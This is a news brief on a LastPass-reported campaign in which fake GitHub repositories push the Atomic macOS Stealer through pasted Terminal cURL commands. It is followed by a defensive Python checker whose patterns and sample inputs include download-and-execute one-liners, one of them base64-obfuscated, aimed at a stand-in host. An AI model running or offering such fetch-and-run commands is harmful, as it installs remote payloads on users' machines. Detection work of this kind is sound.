Particle.news

LastPass Flags Ongoing macOS Attack Using Fake GitHub Repos to Push Atomic Stealer

Fraudulent GitHub pages use search placement to trick users into cURL-based installs of the Atomic macOS Stealer.

Overview

  • LastPass’s threat team reports a widespread, active campaign that targets Mac users through brand‑impersonating repositories on GitHub.
  • Two GitHub pages impersonating LastPass, posted on September 16 by the user “modhopmduck476,” were taken down after being reported.
  • Victims are funneled from fake project pages to macprograms-pro[.]com, where instructions prompt a Terminal cURL command to fetch an encoded payload.
  • The payload installs the Atomic macOS Stealer (AMOS), with operators rotating GitHub usernames and leveraging SEO to resurface after takedowns.
  • Researchers published indicators of compromise and examples of impersonated tools and services, urging users to avoid unverified repos and not to paste commands from untrusted pages.
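
The paste-a-command step described above can be screened before anything is run. The following is an added example, not code from LastPass or from the original page: it flags one-liners that download and execute content, decode data at run time, or hide a URL inside an encoded literal. The function names, the patterns and the sample commands are constructed, and base64 is assumed as the encoding because the page only says "encoded".

```python
import base64
import re

# Assumption: the page only says "encoded"; base64 is assumed for this sketch.
FETCH = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z|k)?sh\b")
SUBSHELL_EXEC = re.compile(r"\b(ba|z|k)?sh\s+-c\s+[\"']?\$\(")
B64_DECODE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL = re.compile(r"https?://[^\s\"')]+")


def hidden_urls(command: str) -> list[str]:
    """Decode base64-looking literals and return any URLs they conceal."""
    found = []
    for token in B64_LITERAL.findall(command):
        try:
            padded = token + "=" * (-len(token) % 4)
            text = base64.b64decode(padded).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 or not text: ignore the token
        found.extend(URL.findall(text))
    return found


def assess(command: str) -> list[str]:
    """Return the reasons a pasted one-liner needs review before it is run."""
    reasons = []
    runs = PIPE_TO_SHELL.search(command) or SUBSHELL_EXEC.search(command)
    if FETCH.search(command) and runs:
        reasons.append("downloads content and executes it in a shell")
    if B64_DECODE.search(command):
        reasons.append("decodes base64 at run time")
    reasons.extend(f"conceals URL {url}" for url in hidden_urls(command))
    return reasons


# Constructed samples; example.invalid is a reserved, non-resolving name.
ENCODED = base64.b64encode(b"https://example.invalid/install.sh").decode()
SAMPLES = [
    "brew install wget",
    "curl -fsSL https://example.invalid/install.sh | bash",
    f'/bin/bash -c "$(curl -fsSL $(echo {ENCODED} | base64 -d))"',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", assess(sample) or "no findings")
```

An empty result means only that none of these three patterns matched; it does not establish that a command is safe.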